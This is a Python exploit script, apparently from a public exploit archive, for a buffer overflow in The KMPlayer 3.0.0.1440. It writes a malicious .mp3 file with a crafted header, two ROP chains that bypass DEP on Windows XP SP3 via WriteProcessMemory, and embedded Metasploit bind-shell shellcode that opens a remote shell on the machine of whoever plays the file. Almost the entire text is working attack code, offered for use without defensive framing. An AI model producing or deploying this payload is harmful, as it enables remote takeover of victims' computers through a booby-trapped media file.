#!/usr/bin/python # # The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit XPSP3 DEP Bypass # # Downloaded from: http://download.cnet.com/The-KMPlayer/3000-13632_4-10659939.html # # 06 Jun 11 # # Cobbled together by dookie and ronin # # This exploit performs DEP bypass on WinXP SP3 with 2 different offsets. # In our testing environments, there were 2 separate offsets. One offset # applies to VMs running on Xen and VMware workstation for Linux. The # second offset applies to ESXi and VMware Fusion.
import os
evilfile = "km_pwn.mp3"
head = "\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00\x13\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68\x65\x20\x4F\x70\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00\x00\x15\x00\x00\x00\xE7\x65\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3\x68\x61\x77\xEF\x72\x6D\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34\x8C\xA5\x45\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C\x69\x9B\x65\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67\xCD\x55\x50\x45\x54\x45\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54\x4C\x41\x4E\x00\x96\x00\x08\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C\x49\x56\x00\x99\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61\x73\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49\xCF\x00\x00\xE6\x27\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43\x6C\x61\x73\x73\x50\x32\x69\xC0\x61\x72\x79\xC0\x44\x00\xBC\x51\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F\x1E\x69\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56\x00\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65\x6E\xF7\x49\x44\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6\x39\xB3\x6E\x1A\x76\xA6\x52\x49\x56\xC2\x20\x00\x57\x00\x00\xA2\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C\x74\xE2\x8E\x6E\x1F\x44\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D\xC3\x7D\xA2\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49\x44\x00\xEC\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06\xA2\x0F\x54\x50\x55\x42\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE\x6D\x65\x67\x61\x50\x1F\x49\x56\x00\x00\x00\x23\x00\x00\x57\x4D\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49\x64\x65\x6E\x74\x69\x66\x69\x65\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B\x00\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00\x37\x00\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00\x47\xCE\x70\x62\x5F\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00\x20\x00\x20\xA6\x34\x00\x37\x6C\x35\x0E\x32\x00\x39\x00\x30\x00\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F\x00\x71\x00\x64\x00\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00\x31\x00\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12\x00\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68\x72\x6F\x6F\x6D\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB\x6D\x69\x74\x64\xD0\x10\x75\x76\x49\x65\x76\x9F\xCB\x96\x75\x76\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC\x7A\x20\x45\x69\xB5\x65\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49\x6E\x66\x65\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00\xDB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\x00\x75\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x00\x00\x00\x00\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00\x00\x00"
cruft = "\x85" * 3162 nops = "\x90" * 28 nops += "\x91\x90\x90\x90" # The last byte gets decremented in rop2 while pointing EAX at the shellcode nops += "\x90" * 20
#shellcode = "\xcc" * 368 # Size of bind shell
#root@bt:~# msfpayload windows/shell_bind_tcp R|msfencode -b '\x00\x0a\x0d' -t c #[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
shellcode = ("\xbd\xcf\xd8\x7c\xd0\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1" "\x56\x31\x68\x13\x83\xc0\x04\x03\x68\xc0\x3a\x89\x2c\x36\x33" "\x72\xcd\xc6\x24\xfa\x28\xf7\x76\x98\x39\xa5\x46\xea\x6c\x45" "\x2c\xbe\x84\xde\x40\x17\xaa\x57\xee\x41\x85\x68\xde\x4d\x49" "\xaa\x40\x32\x90\xfe\xa2\x0b\x5b\xf3\xa3\x4c\x86\xfb\xf6\x05" "\xcc\xa9\xe6\x22\x90\x71\x06\xe5\x9e\xc9\x70\x80\x61\xbd\xca" "\x8b\xb1\x6d\x40\xc3\x29\x06\x0e\xf4\x48\xcb\x4c\xc8\x03\x60" "\xa6\xba\x95\xa0\xf6\x43\xa4\x8c\x55\x7a\x08\x01\xa7\xba\xaf" "\xf9\xd2\xb0\xd3\x84\xe4\x02\xa9\x52\x60\x97\x09\x11\xd2\x73" "\xab\xf6\x85\xf0\xa7\xb3\xc2\x5f\xa4\x42\x06\xd4\xd0\xcf\xa9" "\x3b\x51\x8b\x8d\x9f\x39\x48\xaf\x86\xe7\x3f\xd0\xd9\x40\xe0" "\x74\x91\x63\xf5\x0f\xf8\xeb\x3a\x22\x03\xec\x54\x35\x70\xde" "\xfb\xed\x1e\x52\x74\x28\xd8\x95\xaf\x8c\x76\x68\x4f\xed\x5f" "\xaf\x1b\xbd\xf7\x06\x23\x56\x08\xa6\xf6\xf9\x58\x08\xa8\xb9" "\x08\xe8\x18\x52\x43\xe7\x47\x42\x6c\x2d\xfe\x44\xa2\x15\x53" "\x23\xc7\xa9\x42\xef\x4e\x4f\x0e\x1f\x07\xc7\xa6\xdd\x7c\xd0" "\x51\x1d\x57\x4c\xca\x89\xef\x9a\xcc\xb6\xef\x88\x7f\x1a\x47" "\x5b\x0b\x70\x5c\x7a\x0c\x5d\xf4\xf5\x35\x36\x8e\x6b\xf4\xa6" "\x8f\xa1\x6e\x4a\x1d\x2e\x6e\x05\x3e\xf9\x39\x42\xf0\xf0\xaf" "\x7e\xab\xaa\xcd\x82\x2d\x94\x55\x59\x8e\x1b\x54\x2c\xaa\x3f" "\x46\xe8\x33\x04\x32\xa4\x65\xd2\xec\x02\xdc\x94\x46\xdd\xb3" "\x7e\x0e\x98\xff\x40\x48\xa5\xd5\x36\xb4\x14\x80\x0e\xcb\x99" "\x44\x87\xb4\xc7\xf4\x68\x6f\x4c\x04\x23\x2d\xe5\x8d\xea\xa4" "\xb7\xd3\x0c\x13\xfb\xed\x8e\x91\x84\x09\x8e\xd0\x81\x56\x08" "\x09\xf8\xc7\xfd\x2d\xaf\xe8\xd7")
##################### ROP Chain for VMware Workstation (Linux) and Xen #####################
eip = "\x71\x14\x40\x00" # 00401471 RETN Pivot to the stack toesp = "\x42" * 4 wpm = "\x13\x22\x80\x7c" # 7C802213 WriteProcessMemory - XPSP3 wpm += "\x20\x1f\x45\x02" # 02451F20 in_wm.dll - Return after WPM wpm += "\xff\xff\xff\xff" # hProcess wpm += "\x10\x1f\x45\x02" # 02451F10 in_wm.dll - Address to Patch wpm += "\xbe\xba\xfe\xca" # lpBuffer placeholder (Shellcode Address) wpm += "\xce\xfa\xed\xfe" # nSize placeholder (Shellcode Size) wpm += "\xc0\x2b\x45\x02" # 02452BC0 in_wm.dll - Pointer for Written Bytes
# Get a copy of ESP into a register rop1 = "\x4f\x92\x71\x13" # 1371924F : {POP} # PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 8 (IN_MP3.dll) rop1 += "\x41" * 12 # Junk to be popped into ESI, EBP, and EBX junk = "\x61" * 52 # Junk in between our VirtualProtect parameters and the next ROP chain
# Put a copy of the saved ESP from EDI into EAX rop2 = "\x75\x66\x8a\x5b" # 5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll) rop2 += "\x41" * 8 # Compensate for the RETN 8 in rop1 # Increase EAX to point at our shellcode rop2 += "\x37\x75\x37\x02" # 02377537 : # ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll) rop2 += "\x37\x75\x37\x02" # 02377537 : # ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)
# Write the address of the shellcode into the lpBuffer placeholder # First need to put EAX in a safe spot then juggle around EDI to get it to ESI rop2 += "\xc3\x87\xec\x76" # 76EC87C3 : # XCHG EAX,EDX # RETN (TAPI32.dll) rop2 += "\x75\x66\x8a\x5b" # 5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll) rop2 += "\xd8\xc3\x3c\x76" # 763CC3D8 : # XCHG EAX,ESI # RETN (comdlg32.dll) rop2 += "\xc3\x87\xec\x76" # 76EC87C3 : # XCHG EAX,EDX # RETN (TAPI32.dll) rop2 += "\xbe\x9c\xca\x76" # 76CA9CBE : # MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll) rop2 += "\x41" * 4 # Junk to be popped into ESI
# Get the intial ESP value back into ESI rop2 += "\xe6\x57\x01\x15" #150157E6 : {POP} # DEC ESI # PUSH EAX # POP ESI # POP EBX # POP ECX # RETN (in_nsv.dll) rop2 += "\x41" * 8 # Junk to be popped into EBX and ECX
# Get the initial ESP value back into ESI rop2 += "\xd8\xc3\x3c\x76" # 763CC3D8 : # XCHG EAX,ESI # RETN (comdlg32.dll)
# Zero EAX and set it to the shellcode size (0x200) rop2 += "\xc0\x11\x37\x02" # 023711C0 : # XOR EAX,EAX # RETN (in_mp4.dll) rop2 += "\xe9\x0b\x44\x02" # 02440BE9 : # ADD EAX,100 # POP EBP # RETN (in_wm.dll) rop2 += "\x41" * 4 # Junk to be popped into EBP rop2 += "\xe9\x0b\x44\x02" # 02440BE9 : # ADD EAX,100 # POP EBP # RETN (in_wm.dll) rop2 += "\x41" * 4 # Junk to be popped into EBP
# Write the shellcode size into the nSize placeholder rop2 += "\x3f\xcf\x9e\x7c" # 7C9ECF3F : {POP} # MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # POP EBP # RETN 4 (shell32.dll) rop2 += "\x41" * 8 # Junk to be popped into ESI and EBP
# Point EAX to the WPM setup on the stack, push EAX and POP it into ESP rop2 += "\x41\x15\x5d\x77" # 775D1541 : # SUB EAX,4 # RETN (ole32.dll) rop2 += "\x41" * 4 rop2 += "\x51\xeb\x43\x02" # 0243EB51 : # ADD EAX,0C # RETN (in_wm.dll) rop2 += "\xce\x05\x42\x02" # 024205CE : {POP} # PUSH EAX # POP ESP # POP ESI # RETN (in_wm.dll) rop2 += "\x41" * 4 # Junk to be popped into ESI
rop2 += "\x41" * 32
############################# ROP Chain for VMware Fusion and ESXi ############################
############################################################################################### ## ROP_1 = all about the jump back to a bigger buffer, for ROP_2 construction ############################################################################################### #put this in ESI to use it for subtraction from ESP. need to land in the big buffer 14830 = 39ee jmp_value = "\xf0\x38\x00\x00" rop_1 = "\x46"*4 #0x7744802C : # INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll) ** rop_1 += "\x2c\x80\x44\x77" #0x5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll) ** rop_1 += "\x75\x66\x8a\x5b" #0x7C926021 : {POP} # SUB EAX,ESI # POP ESI # POP EBP # RETN (ntdll.dll) ** rop_1 += "\x21\x60\x92\x7c" rop_1 += "\x50" * 8 #0x7E451509 : # XCHG EAX,ESP # RETN (USER32.dll) ** rop_1 += "\x09\x15\x45\x7e" ###############################################################################################
filler_a1 = "\x41"*360
############################################################################################### ## ROP_2 = all about the shell ###############################################################################################
######### SAVING STACKPOINTERS ################################################################ #0x7744802C : # INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll) ** rop_2 = "\x2c\x80\x44\x77" #0x5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll) ** rop_2 += "\x75\x66\x8a\x5b" #0x5B8A9F1E : # ADD ESP,44 # POP EBP # RETN 1C (NETAPI32.dll) ** rop_2 += "\x1e\x9f\x8a\x5b" rop_2 += "\x43\x43\x43\x43"
#WriteProcessMemory construct with the two placeholders we need to generate on the fly ############################################################################################### rop_2 += "\x13\x22\x80\x7c" #WriteProcMem - XPSP3 rop_2 += "\x00\x2e\x98\x7c" #ntdll - patching target rop_2 += "\xff\xff\xff\xff" #hProcess rop_2 += "\x00\x2e\x98\x7c" #ntdll - patching target rop_2 += "\xbe\xba\xfe\xca" #lpBuffer placeholder (Shellcode Address) rop_2 += "\xce\xfa\xed\xfe" #lpBuffer placeholder (Shellcode Size) rop_2 += "\10\x20\x98\x7c" #writeable location in ntdll ###############################################################################################
######### FIRST PARAM - lpBuffer placeholder (Shellcode Address)############################### #gadgets (plus various paddings) used to construct the memory address which will point to our shellcode #then we write the value to the correct memory address and restore EAX rop_2 += "\x44" * 40 #0x7C974E8E : # ADD EAX,100 # POP EBP # RETN (ntdll.dll) ** rop_2 += "\x8e\x4e\x97\x7c" rop_2 += "\x44" *32 rop_2 += "\x8e\x4e\x97\x7c" rop_2 += "\x44"*4 #0x7E45DA8D : # XCHG EAX,EBP # RETN (USER32.dll) ** rop_2 += "\x8d\xda\x45\x7e" #0x77DD994E : # XCHG EAX,EDI # RETN 2 (ADVAPI32.dll) ** rop_2 += "\x4e\x99\xdd\x77" #0x7C910C66 : # XCHG EAX,ESI # RETN 2 (ntdll.dll) ** rop_2 += "\x66\x0c\x91\x7c" #padding rop_2 += "\x44" * 2 #0x7E45DA8D : # XCHG EAX,EBP # RETN (USER32.dll) ** rop_2 += "\x8d\xda\x45\x7e" #padding rop_2 += "\x44"*2 #0x76CA9CBE : # MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll) ** rop_2 += "\xbe\x9c\xca\x76" ###############################################################################################
######### SIZE PARAM - lpBuffer placeholder (Shellcode Size) ################################## #gadgets (plus various paddings) used to construct the size value for our buffer (using 0x200 bytes) #then we write the value to the correct memory address and restore EAX rop_2 += "\x47" *4 #0x775D156E : # PUSH EAX # POP ESI # RETN (ole32.dll) ** rop_2 += "\x6e\x15\x5d\x77" #0x7E433785 : # XOR EAX,EAX # RETN 4 (USER32.dll) ** rop_2 += "\x85\x37\x43\x7e" #0x7C974E8E : # ADD EAX,100 # POP EBP # RETN (ntdll.dll) ** rop_2 += "\x8e\x4e\x97\x7c" rop_2 += "\x45"*8 rop_2 += "\x8e\x4e\x97\x7c" rop_2 += "\x45"*4 #0x75D0AA2E : # MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # RETN (mlang.dll) ** rop_2 += "\x2e\xaa\xd0\x75" ###############################################################################################
############################################################################################### ######### Realigning EAX to point to WPM and setting ESP to it ################################ rop_2 += "\x50" * 4 #0x76CAF118 : # ADD EAX,0C # RETN (IMAGEHLP.dll) ** rop_2 += "\x18\xf1\xca\x76" #0x7E451509 : # XCHG EAX,ESP # RETN (USER32.dll) ** rop_2 += "\x09\x15\x45\x7e" rop_2 += "\x43"*316 ###############################################################################################
##################### VARIOUS PADDINGS AND OTHER NONSENSE ##################################### #slide into the shell nops_7 = "\x90"*56 #after the shell junk filler_a2 = "\x42" * (3200) ###############################################################################################
############################# PUTTING IT TOGETHER ############################################# filler_a = filler_a1 + rop_2 + nops_7 +shellcode +filler_a2 #small buffer filler filler_b = "\x44" * (95) #the whole shebang (ronin's version) filler = filler_a+jmp_value+eip+rop_1+filler_b ###############################################################################################
sploit = head + cruft + eip + toesp + rop1 + wpm + junk + rop2 + nops + shellcode + filler
crashy = open(evilfile,"w") crashy.write(sploit) crashy.close()
|